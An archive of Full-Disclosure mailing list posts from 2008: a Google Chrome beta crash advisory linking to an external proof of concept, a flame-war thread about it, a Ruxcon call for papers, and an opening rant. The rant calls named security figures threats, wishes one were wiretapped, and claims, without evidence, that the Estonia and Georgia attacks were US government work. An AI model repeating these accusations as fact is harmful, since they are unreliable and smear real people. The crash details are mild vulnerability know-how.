Why not let it naturally be a national security agenda or not be a natural national security agenda, why do you need to ramp something up to be a national security agenda when it isn't one? Cyber security isn't a national security agenda, but folks like Marcus Sachs want it to be one, so he can gain control of "cyber" in Washington. This is what I'm afraid of and Marcus Sachs and whoever he is related to need to be watched closely, I saw that Youtube video as a real threat and I'm keeping a close eye on him and any future dialog he outputs into the security community and wider world. Gadi Evron is small fry in comparison to Marcus Sachs, although Gadi is power hungry and could become a national security threat, he isn't right now, the real concern is that of Marcus Sachs and the Cnet News Youtube clip that mentions he or people he has obviously been having discussions with behind the scenes are wanting to artificially ramp up cyber security in timing with Obama or McCain getting into the White House, either so Marcus Sachs or his associates can A) Grab front focus power for the next four years, B) Get funding for various "projects" they deem as important. When you've got big leaders talking about influencing the next administration as they are coming in to a bunch of folks at Black Hat 2008, it really sends alarm bells ringing, I just hope the guy is being wiretapped. Sure, Gadi Evron is power hungry, but there are bigger fish to fry... Marcus Sachs. http://www.youtube.com/watch?v=FSUPTZVlkyU We need to get the full video of the Youtube video link I've posted above put online, does Cnet News have the full video of the presentation? If so post it onto Youtube. Also, if Blackhat.com have the full video of the presentation, please post it online. Can everyone keep an eye on https://www.blackhat.com/html/bh-usa-08/bh-usa-08-archive.html#Sachs and email me when and if the full video appears there, we need to track this guy and keep an eye on him. 
If I ever get into MI5, I'll be focusing all my efforts on Sachs, so I hope the people who do work in MI5 keep an eye on Sachs in the run up to the election and beyond. Gadi is only causing collateral damage right now, by him pumping out about Estonia and Georgia being blamed on Russia and the news journalists believing that, when really both of those incidents were the work of the U.S government. The other governments can put up with Gadi's bot net claims and what appears in the media because of him, because it's not really his fault unless the CIA have leaned on Mossad, to lean on Gadi Evron, to post on the internet who is to blame for Estonia, Georgia and whatever else Sachs and company may have planned to artificially ramp up cyber security as a national security agenda as the next president is coming in, (See Youtube video for Marcus Sachs quotes). All the best, n3td3v From psy.echo at gmail.com Wed Sep 3 00:50:45 2008 From: psy.echo at gmail.com (Rishi Narang) Date: Wed, 3 Sep 2008 05:20:45 +0530 Subject: [Full-disclosure] Google Chrome Browser Vulnerability Message-ID: <985632087.20080903052045@gmail.com> Hi, --------------------------------------------------- Software: Google Chrome Browser 0.2.149.27 Tested: Windows XP Professional SP3 Result: Google Chrome Crashes with All Tabs Problem: An issue exists in how Chrome behaves with undefined handlers in chrome.dll version 0.2.149.27. A crash can result without user interaction. When a user is made to visit a malicious link, which has an undefined handler followed by a 'special' character, Chrome crashes with a Google Chrome message window "Whoa! Google Chrome has crashed. Restart now?". It fails in dealing with the POP EBP instruction when pointed out by the EIP register at 0x01002FF4. 
Proof of Concept: http://evilfingers.com/advisory/google_chrome_poc.php Credit: Rishi Narang (psy.echo) www.greyhat.in www.evilfingers.com --------------------------------------------------- -- Thanks & Regards, Rishi Narang | Security Researcher Founder, GREYHAT Insight Key: 0x8D67A3A3 (www.greyhat.in/key.asc) www.greyhat.in ... eschew obfuscation, espouse elucidation. From nick at virus-l.demon.co.uk Wed Sep 3 00:53:41 2008 From: nick at virus-l.demon.co.uk (Nick FitzGerald) Date: Wed, 03 Sep 2008 11:53:41 +1200 Subject: [Full-disclosure] die In-Reply-To: <02FEEEFC-BA0D-4AD8-9C90-96F8A0FC875C@kyx.net> References: <2d792fb20809020951s43391a96u1823aac520f4a6c7@mail.gmail.com> <21110.1220379206@turing-police.cc.vt.edu> <02FEEEFC-BA0D-4AD8-9C90-96F8A0FC875C@kyx.net> Message-ID: <48BE7AC5.6973.177F702B@nick.virus-l.demon.co.uk> Dragos Ruiu wrote: > Seriously... with modern multi-paned mail readers, top-posting is a > better way to communicate. That depends on how you define "communicate"... It also assumes that everyone will gladly, sheepfully use "modern, multi- paned mail readers". You may be a sheep whose communications consist of little more than adding simple confirming, negating or further-detail-requesting bleats to others' messages, but "discussion lists" and many other forms of communication commonly engaged via Email by higher order, bi-pedal mammals demand more sophistication of all of the communicator, mail reader and medium... If you dislike "no top posting" because of neanderthals who haven't grokked that it is about better communication and thus mindlessly quote an entire message to add their simple confirming, negating or further- detail-requesting grunts at the bottom, then you are making a false comparison, as such stupidity is equally anti-communication-assisting as your preferred top-bleating approach. 
Regards, Nick FitzGerald From xploitable at gmail.com Wed Sep 3 01:21:19 2008 From: xploitable at gmail.com (n3td3v) Date: Wed, 3 Sep 2008 01:21:19 +0100 Subject: [Full-disclosure] Google Chrome Browser Vulnerability In-Reply-To: <985632087.20080903052045@gmail.com> References: <985632087.20080903052045@gmail.com> Message-ID: <4b6ee9310809021721r3ee811d1o4c719055f22cac04@mail.gmail.com> On Wed, Sep 3, 2008 at 12:50 AM, Rishi Narang wrote: > > Proof of Concept: > http://evilfingers.com/advisory/google_chrome_poc.php > You didn't manage to jail break the entire browser, that's what's unique about Chrome, each tab is in jail, so the entire application doesn't crash. The real elite exploits will come when you can jail break the entire Chrome application... "Chrome's architecture lends itself to secure browsing. Each Web page, or tab, runs in its own process, and is blocked from accessing other processes on the computer. "We've taking the existing process boundary," the comic says, "and made it into a jail." Different and more flexible permissions are being developed for plug-ins, however." http://news.cnet.com/8301-17939_109-10029914-2.html From larry at larryseltzer.com Wed Sep 3 01:13:40 2008 From: larry at larryseltzer.com (Larry Seltzer) Date: Tue, 2 Sep 2008 20:13:40 -0400 Subject: [Full-disclosure] Google Chrome Browser Vulnerability In-Reply-To: <985632087.20080903052045@gmail.com> References: <985632087.20080903052045@gmail.com> Message-ID: <9B9E7EA67E1B1342B2D25F3FD1B32930012692C1@BE35.exg3.exghost.com> Holy crap, a crash bug in a beta browser! 
Larry Seltzer eWEEK.com Security Center Editor http://security.eweek.com/ http://blogs.pcmag.com/securitywatch/ Contributing Editor, PC Magazine larry.seltzer at ziffdavisenterprise.com -----Original Message----- From: full-disclosure-bounces at lists.grok.org.uk [mailto:full-disclosure-bounces at lists.grok.org.uk] On Behalf Of Rishi Narang Sent: Tuesday, September 02, 2008 7:51 PM To: full-disclosure at lists.grok.org.uk Subject: [Full-disclosure] Google Chrome Browser Vulnerability Hi, --------------------------------------------------- Software: Google Chrome Browser 0.2.149.27 Tested: Windows XP Professional SP3 Result: Google Chrome Crashes with All Tabs Problem: An issue exists in how chrome behaves with undefined-handlers in chrome.dll version 0.2.149.27. A crash can result without user interaction. When a user is made to visit a malicious link, which has an undefined handler followed by a 'special' character, the chrome crashes with a Google Chrome message window "Whoa! Google Chrome has crashed. Restart now?". It fails in dealing with the POP EBP instruction when pointed out by the EIP register at 0x01002FF4. Proof of Concept: http://evilfingers.com/advisory/google_chrome_poc.php Credit: Rishi Narang (psy.echo) www.greyhat.in www.evilfingers.com --------------------------------------------------- -- Thanks & Regards, Rishi Narang | Security Researcher Founder, GREYHAT Insight Key: 0x8D67A3A3 (www.greyhat.in/key.asc) www.greyhat.in ... eschew obfuscation, espouse elucidation. _______________________________________________ Full-Disclosure - We believe in it. 
Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ From psy.echo at gmail.com Wed Sep 3 01:28:59 2008 From: psy.echo at gmail.com (Rishi Narang) Date: Wed, 3 Sep 2008 05:58:59 +0530 Subject: [Full-disclosure] Google Chrome Browser Vulnerability In-Reply-To: <9B9E7EA67E1B1342B2D25F3FD1B32930012692C1@BE35.exg3.exghost.com> References: <985632087.20080903052045@gmail.com> <9B9E7EA67E1B1342B2D25F3FD1B32930012692C1@BE35.exg3.exghost.com> Message-ID: <1337764015.20080903055859@gmail.com> Hello Larry, Ya, a beta browser (though I forgot to mention it) but, is there any product from Google not in Beta ;) Thanks, our searches are not through a beta search engine. Anyways, it's just an attempt to make it a better place to browse and help it come out of Beta. Rest, I very much liked the minimalist approach and simplicity of it + fast surfing speed. Cheers! Just my 2 cents. -- Thanks & Regards, Rishi Narang | Security Researcher Founder, GREYHAT Insight Key: 0x8D67A3A3 (www.greyhat.in/key.asc) www.greyhat.in ... eschew obfuscation, espouse elucidation. Wednesday, September 3, 2008, 5:43:40 AM, you wrote: > Holy crap, a crash bug in a beta browser! 
> Larry Seltzer > eWEEK.com Security Center Editor > http://security.eweek.com/ > http://blogs.pcmag.com/securitywatch/ > Contributing Editor, PC Magazine > larry.seltzer at ziffdavisenterprise.com > -----Original Message----- > From: full-disclosure-bounces at lists.grok.org.uk > [mailto:full-disclosure-bounces at lists.grok.org.uk] On Behalf Of Rishi > Narang > Sent: Tuesday, September 02, 2008 7:51 PM > To: full-disclosure at lists.grok.org.uk > Subject: [Full-disclosure] Google Chrome Browser Vulnerability > Hi, > --------------------------------------------------- > Software: > Google Chrome Browser 0.2.149.27 > Tested: > Windows XP Professional SP3 > Result: > Google Chrome Crashes with All Tabs > Problem: > An issue exists in how chrome behaves with undefined-handlers in > chrome.dll version 0.2.149.27. A crash can result without user > interaction. When a user is made to visit a malicious link, which has an > undefined handler followed by a 'special' character, the chrome crashes > with a Google Chrome message window "Whoa! Google Chrome has crashed. > Restart now?". It fails in dealing with the POP EBP instruction when > pointed out by the EIP register at 0x01002FF4. > Proof of Concept: > http://evilfingers.com/advisory/google_chrome_poc.php > Credit: > Rishi Narang (psy.echo) > www.greyhat.in > www.evilfingers.com > --------------------------------------------------- > -- > Thanks & Regards, > Rishi Narang | Security Researcher > Founder, GREYHAT Insight > Key: 0x8D67A3A3 (www.greyhat.in/key.asc) > www.greyhat.in > ... eschew obfuscation, espouse elucidation. > _______________________________________________ > Full-Disclosure - We believe in it. 
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ From xploitable at gmail.com Wed Sep 3 01:30:23 2008 From: xploitable at gmail.com (n3td3v) Date: Wed, 3 Sep 2008 01:30:23 +0100 Subject: [Full-disclosure] Google Chrome Browser Vulnerability In-Reply-To: <9B9E7EA67E1B1342B2D25F3FD1B32930012692C1@BE35.exg3.exghost.com> References: <985632087.20080903052045@gmail.com> <9B9E7EA67E1B1342B2D25F3FD1B32930012692C1@BE35.exg3.exghost.com> Message-ID: <4b6ee9310809021730o45bc7f9em3af3a34ad10d0b21@mail.gmail.com> On Wed, Sep 3, 2008 at 1:13 AM, Larry Seltzer wrote: > Holy crap, a crash bug in a beta browser! > Only the current tab I am in, not the entire application. There is also an option to restore the crashed tab after I click on "OK", so none of the data within that tab has been lost. From michaelslists at gmail.com Wed Sep 3 01:35:02 2008 From: michaelslists at gmail.com (silky) Date: Wed, 3 Sep 2008 10:35:02 +1000 Subject: [Full-disclosure] Google Chrome Browser Vulnerability In-Reply-To: <9B9E7EA67E1B1342B2D25F3FD1B32930012692C1@BE35.exg3.exghost.com> References: <985632087.20080903052045@gmail.com> <9B9E7EA67E1B1342B2D25F3FD1B32930012692C1@BE35.exg3.exghost.com> Message-ID: <5e01c29a0809021735k5b74f0b5v433a9b6cafb96058@mail.gmail.com> On Wed, Sep 3, 2008 at 10:13 AM, Larry Seltzer wrote: > Holy crap, a crash bug in a beta browser! oh fuck off with referring to it as "beta". beta is just a lame tag so you can release something that you don't entirely trust. imho if it's "beta" keep it fucking private. if it's public, grow a set of balls and don't call it "beta" so you can hide behind that when it fails. grow the fuck up, google. 
> Larry Seltzer > eWEEK.com Security Center Editor > http://security.eweek.com/ > http://blogs.pcmag.com/securitywatch/ > Contributing Editor, PC Magazine > larry.seltzer at ziffdavisenterprise.com -- noon silky http://www.themonkeynet.com/armada/ From michaelslists at gmail.com Wed Sep 3 01:58:01 2008 From: michaelslists at gmail.com (silky) Date: Wed, 3 Sep 2008 10:58:01 +1000 Subject: [Full-disclosure] Google Chrome Browser Vulnerability In-Reply-To: References: <985632087.20080903052045@gmail.com> <9B9E7EA67E1B1342B2D25F3FD1B32930012692C1@BE35.exg3.exghost.com> <5e01c29a0809021735k5b74f0b5v433a9b6cafb96058@mail.gmail.com> Message-ID: <5e01c29a0809021758y4cae624m70e1165669773034@mail.gmail.com> On Wed, Sep 3, 2008 at 10:55 AM, Jardel Weyrich wrote: > I'd recommend you to read > http://en.wikipedia.org/wiki/Software_release_life_cycle#Beta i'd recommend you re-read my post, and even that link. beta does not go public. and even if you do, don't release something publicly only later to claim "oh it wasn't really ready, that's why that's not done". it's just pathetic. can't have it both ways. if you put up, expect to be shot down if there is an angle. -- noon silky http://www.themonkeynet.com/armada/ From xploitable at gmail.com Wed Sep 3 01:59:29 2008 From: xploitable at gmail.com (n3td3v) Date: Wed, 3 Sep 2008 01:59:29 +0100 Subject: [Full-disclosure] Google Chrome Browser Vulnerability In-Reply-To: <1337764015.20080903055859@gmail.com> References: <985632087.20080903052045@gmail.com> <9B9E7EA67E1B1342B2D25F3FD1B32930012692C1@BE35.exg3.exghost.com> <1337764015.20080903055859@gmail.com> Message-ID: <4b6ee9310809021759p25346452xd9622415c9ee7001@mail.gmail.com> On Wed, Sep 3, 2008 at 1:28 AM, Rishi Narang wrote: > Hello Larry, > > Ya, a beta browser (though I forgot to mention it) but, is there any product from Google not in Beta ;) Thanks, our searches are not through a beta search engine.
> Anyways, it's just an attempt to make it a better place to browse and help it come out of Beta. > Rest, I very much liked the minimalist approach and simplicity of it + fast surfing speed. Cheers! > > Just my 2 cents. > It didn't break out of jail for me, did it break out of jail for anyone else? All the best, n3td3v From w.jardel at gmail.com Wed Sep 3 01:55:19 2008 From: w.jardel at gmail.com (Jardel Weyrich) Date: Tue, 2 Sep 2008 21:55:19 -0300 Subject: [Full-disclosure] Google Chrome Browser Vulnerability In-Reply-To: <5e01c29a0809021735k5b74f0b5v433a9b6cafb96058@mail.gmail.com> References: <985632087.20080903052045@gmail.com> <9B9E7EA67E1B1342B2D25F3FD1B32930012692C1@BE35.exg3.exghost.com> <5e01c29a0809021735k5b74f0b5v433a9b6cafb96058@mail.gmail.com> Message-ID: I'd recommend you to read http://en.wikipedia.org/wiki/Software_release_life_cycle#Beta On Tue, Sep 2, 2008 at 9:35 PM, silky wrote: > On Wed, Sep 3, 2008 at 10:13 AM, Larry Seltzer > wrote: > > Holy crap, a crash bug in a beta browser! > > oh fuck off with referring to it as "beta". beta is just a lame tag so > you can release something that you don't entirely trust. > > imho if it's "beta" keep it fucking private. if it's public, grow a > set of balls and don't call it "beta" so you can hide behind that when > it fails. > > grow the fuck up, google. > > > > Larry Seltzer > > eWEEK.com Security Center Editor > > http://security.eweek.com/ > > http://blogs.pcmag.com/securitywatch/ > > Contributing Editor, PC Magazine > > larry.seltzer at ziffdavisenterprise.com > > -- > noon silky > http://www.themonkeynet.com/armada/ > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ >
From cfp at ruxcon.org.au Tue Sep 2 06:14:33 2008 From: cfp at ruxcon.org.au (cfp at ruxcon.org.au) Date: Tue, 2 Sep 2008 05:14:33 +0000 (UTC) Subject: [Full-disclosure] RUXCON 2008 Final Call For Papers Message-ID: <20080902051433.D1CB836F0C5@mail.ruxcon.org.au> RUXCON 2008 FINAL CALL FOR PAPERS Ruxcon would like to announce the final call for papers for the fifth annual Ruxcon conference. This year the conference will take place over the weekend of the 29th to the 30th of November. As with previous years, Ruxcon will be held at the University of Technology, Sydney, Australia. The deadline for submissions is the 15th of November. * What is Ruxcon? Ruxcon strives to be Australia's most technical and interesting computer security conference. We're back for the fifth year and intend to bring you another high quality conference. The conference is held over two days in a relaxed atmosphere, allowing attendees to enjoy themselves whilst expanding their knowledge of security. Live presentations and activities will cover a full range of defensive and offensive security topics, varying from unpublished research to required reading for the public security community. For more information, please visit http://www.ruxcon.org.au * Presentation Information Presentations are set to run for 50 minutes, and will be of a formal nature, with slides and a speech. * Presentation Submissions Ruxcon would like to invite people who are interested in security to submit a presentation.
Topics of interest include, but are not limited to: o Code analysis o Exploitation techniques o Network scanning and analysis o Cryptography o Malware Analysis o Reverse engineering o Forensics and Anti-forensics o Social engineering o Web application security o Database security o Legal aspects of computer security and surrounding issues o Law enforcement activities o Telecommunications security (mobile, GSM, VOIP, etc.) Submissions should thoroughly outline your desired presentation subject. Accompanying your submission should be the slides you intend to use or a detailed paper explaining your subject. If you have any enquiries about submissions, or would like to make a submission, please send an e-mail to presentations @ ruxcon dot org dot au The deadline for submissions is the 15th of November. If approved we will additionally require: i. A brief personal biography (between 2-5 paragraphs in length), including: skill set, experience, and credentials. ii. A description on your presentation or workshop (between 2-5 paragraphs in length). 
* Contact Details Presentation Submissions: presentations @ ruxcon dot org dot au General Enquiries: staff @ ruxcon dot org dot au From xploitable at gmail.com Wed Sep 3 02:13:54 2008 From: xploitable at gmail.com (n3td3v) Date: Wed, 3 Sep 2008 02:13:54 +0100 Subject: [Full-disclosure] Google Chrome Browser Vulnerability In-Reply-To: <5e01c29a0809021758y4cae624m70e1165669773034@mail.gmail.com> References: <985632087.20080903052045@gmail.com> <9B9E7EA67E1B1342B2D25F3FD1B32930012692C1@BE35.exg3.exghost.com> <5e01c29a0809021735k5b74f0b5v433a9b6cafb96058@mail.gmail.com> <5e01c29a0809021758y4cae624m70e1165669773034@mail.gmail.com> Message-ID: <4b6ee9310809021813i8811b04ybeed247b0dd47c17@mail.gmail.com> On Wed, Sep 3, 2008 at 1:58 AM, silky wrote: > On Wed, Sep 3, 2008 at 10:55 AM, Jardel Weyrich wrote: >> I'd recommend you to read >> http://en.wikipedia.org/wiki/Software_release_life_cycle#Beta > > i'd recommend you re-read my post, and even that link. > > beta does not go public. and even if you do, don't release something > publicly only later to claim "oh it wasn't really ready, that's why > that's not done". it's just pathetic. can't have it both ways. if you > put up, expect to be shot down if there is an angle. > > -- > noon silky > http://www.themonkeynet.com/armada/ > Ok, so can someone answer the question, does this break out of jail, yes or no? -- A security mailing list for computer security news and relevant world news in a breaking news format.
https://groups.google.com/group/n3td3v From linux-fan at onda.com.br Wed Sep 3 03:01:24 2008 From: linux-fan at onda.com.br (Giancarlo Razzolini) Date: Tue, 02 Sep 2008 23:01:24 -0300 Subject: [Full-disclosure] Google Chrome Browser Vulnerability In-Reply-To: <4b6ee9310809021813i8811b04ybeed247b0dd47c17@mail.gmail.com> References: <985632087.20080903052045@gmail.com> <9B9E7EA67E1B1342B2D25F3FD1B32930012692C1@BE35.exg3.exghost.com> <5e01c29a0809021735k5b74f0b5v433a9b6cafb96058@mail.gmail.com> <5e01c29a0809021758y4cae624m70e1165669773034@mail.gmail.com> <4b6ee9310809021813i8811b04ybeed247b0dd47c17@mail.gmail.com> Message-ID: <48BDEFF4.4040203@onda.com.br> n3td3v wrote: > On Wed, Sep 3, 2008 at 1:58 AM, silky wrote: > >> On Wed, Sep 3, 2008 at 10:55 AM, Jardel Weyrich wrote: >> >>> I'd recommend you to read >>> http://en.wikipedia.org/wiki/Software_release_life_cycle#Beta >>> >> i'd recommend you re-read my post, and even that link. >> >> beta does not go public. and even if you do, don't release something >> publicly only later to claim "oh it wasn't really ready, that's why >> that's not done". it's just pathetic. can't have it both ways. if you >> put up, expect to be shot down if there is an angle. >> >> -- >> noon silky >> http://www.themonkeynet.com/armada/ >> >> > > Ok, so can someone answer the question, does this break out of jail, yes or no? > > Discover it by yourself. Aren't you the bad ass guy of security? Really, I'm tired of seeing netshit just making noise on this list. Also, a bug in a beta browser is just a bug in a beta browser. I don't expect to be using it in the near future, so I don't care if it has bugs now.
My 2 cents, -- Giancarlo Razzolini http://lock.razzolini.adm.br Linux User 172199 Red Hat Certified Engineer no:804006389722501 Verify:https://www.redhat.com/certification/rhce/current/ Kid With No Content Number #002 OpenBSD Stable Ubuntu 8.04 Hardy Heron 4386 2A6F FFD4 4D5F 5842 6EA0 7ABE BBAB 9C0E 6B85 From xploitable at gmail.com Wed Sep 3 03:21:20 2008 From: xploitable at gmail.com (n3td3v) Date: Wed, 3 Sep 2008 03:21:20 +0100 Subject: [Full-disclosure] Google Chrome Browser Vulnerability In-Reply-To: <48BDEFF4.4040203@onda.com.br> References: <985632087.20080903052045@gmail.com> <9B9E7EA67E1B1342B2D25F3FD1B32930012692C1@BE35.exg3.exghost.com> <5e01c29a0809021735k5b74f0b5v433a9b6cafb96058@mail.gmail.com> <5e01c29a0809021758y4cae624m70e1165669773034@mail.gmail.com> <4b6ee9310809021813i8811b04ybeed247b0dd47c17@mail.gmail.com> <48BDEFF4.4040203@onda.com.br> Message-ID: <4b6ee9310809021921k50be7c8cj289a52584c8ae476@mail.gmail.com> On Wed, Sep 3, 2008 at 3:01 AM, Giancarlo Razzolini wrote: > Discover it by yourself. Aren't you the bad ass guy of security? > I'm just a member of the public, unemployed and stupid... maybe you can help me be badass... although I'd rather be a goodass, 'cause being badass is bad!!!
Take care of your security, n3td3v From urlancomp at gmail.com Wed Sep 3 03:28:33 2008 From: urlancomp at gmail.com (Urlan) Date: Tue, 2 Sep 2008 23:28:33 -0300 Subject: [Full-disclosure] Google Chrome Browser Vulnerability In-Reply-To: <4b6ee9310809021921k50be7c8cj289a52584c8ae476@mail.gmail.com> References: <985632087.20080903052045@gmail.com> <9B9E7EA67E1B1342B2D25F3FD1B32930012692C1@BE35.exg3.exghost.com> <5e01c29a0809021735k5b74f0b5v433a9b6cafb96058@mail.gmail.com> <5e01c29a0809021758y4cae624m70e1165669773034@mail.gmail.com> <4b6ee9310809021813i8811b04ybeed247b0dd47c17@mail.gmail.com> <48BDEFF4.4040203@onda.com.br> <4b6ee9310809021921k50be7c8cj289a52584c8ae476@mail.gmail.com> Message-ID: <8b88d71c0809021928r328c5753qef27ce23d3cf7d16@mail.gmail.com> Why all the fuss over a bug in the beta version?! Ridiculous... Urlan On Tue, Sep 2, 2008 at 11:21 PM, n3td3v wrote: > On Wed, Sep 3, 2008 at 3:01 AM, Giancarlo Razzolini > wrote: > > Discover it by yourself. Aren't you the bad ass guy of security? > > > > I'm just a member of the public, unemployed and stupid... maybe you > can help me be badass... although I'd rather be a goodass, 'cause being > badass is bad!!! > > Take care of your security, > > n3td3v > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ >
From tmdhat at gmail.com Wed Sep 3 04:18:06 2008 From: tmdhat at gmail.com (The Mad Hatter) Date: Wed, 3 Sep 2008 00:18:06 -0300 Subject: [Full-disclosure] Google Chrome Browser Vulnerability In-Reply-To: <8b88d71c0809021928r328c5753qef27ce23d3cf7d16@mail.gmail.com> References: <985632087.20080903052045@gmail.com> <4b6ee9310809021921k50be7c8cj289a52584c8ae476@mail.gmail.com> <8b88d71c0809021928r328c5753qef27ce23d3cf7d16@mail.gmail.com> Message-ID: <200809030018.07155.tmdhat@gmail.com> On Tuesday 02 September 2008 23:28:33 Urlan wrote: > Why all the fuss over a bug in the beta version?! > pt: não seja tão imbecil en: don't be such a moron you are lame twice; first for posting in Portuguese, then for giving a stupid negative contribution to the thread. if you don't have shit to say at least don't say shit. -- tmh From nytrokiss at gmail.com Wed Sep 3 05:34:58 2008 From: nytrokiss at gmail.com (James Matthews) Date: Tue, 2 Sep 2008 21:34:58 -0700 Subject: [Full-disclosure] Google Chrome Browser Vulnerability In-Reply-To: <9B9E7EA67E1B1342B2D25F3FD1B32930012692C1@BE35.exg3.exghost.com> References: <985632087.20080903052045@gmail.com> <9B9E7EA67E1B1342B2D25F3FD1B32930012692C1@BE35.exg3.exghost.com> Message-ID: <8a6b8e350809022134w232c17cbrb7c7e31e2e4f5e8@mail.gmail.com> The same thing happened to Safari when it came out on Windows. On Tue, Sep 2, 2008 at 5:13 PM, Larry Seltzer wrote: > Holy crap, a crash bug in a beta browser!
> > Larry Seltzer > eWEEK.com Security Center Editor > http://security.eweek.com/ > http://blogs.pcmag.com/securitywatch/ > Contributing Editor, PC Magazine > larry.seltzer at ziffdavisenterprise.com > > > -----Original Message----- > From: full-disclosure-bounces at lists.grok.org.uk > [mailto:full-disclosure-bounces at lists.grok.org.uk] On Behalf Of Rishi > Narang > Sent: Tuesday, September 02, 2008 7:51 PM > To: full-disclosure at lists.grok.org.uk > Subject: [Full-disclosure] Google Chrome Browser Vulnerability > > Hi, > > --------------------------------------------------- > Software: > Google Chrome Browser 0.2.149.27 > > Tested: > Windows XP Professional SP3 > > Result: > Google Chrome Crashes with All Tabs > > Problem: > An issue exists in how chrome behaves with undefined-handlers in > chrome.dll version 0.2.149.27. A crash can result without user > interaction. When a user is made to visit a malicious link, which has an > undefined handler followed by a 'special' character, the chrome crashes > with a Google Chrome message window "Whoa! Google Chrome has crashed. > Restart now?". It fails in dealing with the POP EBP instruction when > pointed out by the EIP register at 0x01002FF4. > > Proof of Concept: > http://evilfingers.com/advisory/google_chrome_poc.php > > Credit: > Rishi Narang (psy.echo) > www.greyhat.in > www.evilfingers.com > --------------------------------------------------- > > -- > Thanks & Regards, > Rishi Narang | Security Researcher > Founder, GREYHAT Insight > Key: 0x8D67A3A3 (www.greyhat.in/key.asc) > www.greyhat.in > > ... eschew obfuscation, espouse elucidation. > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > > > _______________________________________________ > Full-Disclosure - We believe in it. 
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > -- http://www.goldwatches.com/ From fergdawg at netzero.net Wed Sep 3 05:48:18 2008 From: fergdawg at netzero.net (Paul Ferguson) Date: Wed, 3 Sep 2008 04:48:18 GMT Subject: [Full-disclosure] Google Chrome Browser Vulnerability Message-ID: <20080902.214818.9950.0@webmail15.vgs.untd.com> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - -- "James Matthews" wrote: > The same thing happened to Safari when it came out on Windows. Well, no kidding. :-) Maybe the flaws that will hound Chrome are due to the fact that it uses Safari as a codebase? See also: http://raffon.net/research/google/chrome/carpet.html http://www.microsoft.com/technet/security/advisory/953818.mspx Enjoy. - - ferg -----BEGIN PGP SIGNATURE----- Version: PGP Desktop 9.6.3 (Build 3017) wj8DBQFIvhcOq1pz9mNUZTMRAstlAKCPqFEaeSc96HHG1gyL5+EbgAYEQACdHBIK kZWN+fHmLdspT7LNmS8Ey08= =fvYJ -----END PGP SIGNATURE----- -- "Fergie", a.k.a. Paul Ferguson Engineering Architecture for the Internet fergdawg(at)netzero.net ferg's tech blog: http://fergdawg.blogspot.com/ From andfarm at gmail.com Wed Sep 3 08:09:56 2008 From: andfarm at gmail.com (Andrew Farmer) Date: Wed, 3 Sep 2008 00:09:56 -0700 Subject: [Full-disclosure] Google Chrome Browser Vulnerability In-Reply-To: <20080902.214818.9950.0@webmail15.vgs.untd.com> References: <20080902.214818.9950.0@webmail15.vgs.untd.com> Message-ID: <125874D1-5583-4D90-BCF9-954613A83EC1@gmail.com> On 02 Sep 08, at 21:48, Paul Ferguson wrote: > - -- "James Matthews" wrote: >> The same thing happened to Safari when it came out on Windows. > > Well, no kidding. :-) > > Maybe the flaws that will hound Chrome are due to the fact that > it uses Safari as a codebase? WebKit != Safari.
Security-related bugs in rendering engines are pretty uncommon. From fergdawg at netzero.net Wed Sep 3 08:37:06 2008 From: fergdawg at netzero.net (Paul Ferguson) Date: Wed, 3 Sep 2008 07:37:06 GMT Subject: [Full-disclosure] Google Chrome Browser Vulnerability Message-ID: <20080903.003706.20417.1@webmail08.vgs.untd.com> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - -- Andrew Farmer wrote: >On 02 Sep 08, at 21:48, Paul Ferguson wrote: >> - -- "James Matthews" wrote: >>> The same thing happened to safari when it came out on windows. >> >> Well, no kidding. :-) >> >> Maybe the flaws that will hound Chrome are due to the fact that >> it uses Safari as a codebase? > >WebKit != Safari. Security-related bugs in rendering engines are pretty uncommon. > Okay, well you cannot deny this is a lackluster starting point. I hope Google can use this inauspicious starting point to build the advertising empire they desire. I for one do not welcome the advertisement overlords. - - ferg -----BEGIN PGP SIGNATURE----- Version: PGP Desktop 9.6.3 (Build 3017) wj8DBQFIvj6aq1pz9mNUZTMRAgEKAKC8rCgCiSPDcSLX8sAe1/ZJRR4fDACeIq9x X1b4Rd9bxRevUo78azKBi5o= =ic8T -----END PGP SIGNATURE----- -- "Fergie", a.k.a. Paul Ferguson Engineering Architecture for the Internet fergdawg(at)netzero.net ferg's tech blog: http://fergdawg.blogspot.com/ From michaelslists at gmail.com Wed Sep 3 08:52:49 2008 From: michaelslists at gmail.com (silky) Date: Wed, 3 Sep 2008 17:52:49 +1000 Subject: [Full-disclosure] Google Chrome Browser Vulnerability In-Reply-To: <20080903.003706.20417.1@webmail08.vgs.untd.com> References: <20080903.003706.20417.1@webmail08.vgs.untd.com> Message-ID: <5e01c29a0809030052x47f06d72hb6788f8d9fdb42a9@mail.gmail.com> On Wed, Sep 3, 2008 at 5:37 PM, Paul Ferguson wrote: > Okay, well you cannot deny this is a lackluster starting point. > > I hope Google can use this inauspicious starting point to build > the advertising empire they desire. 
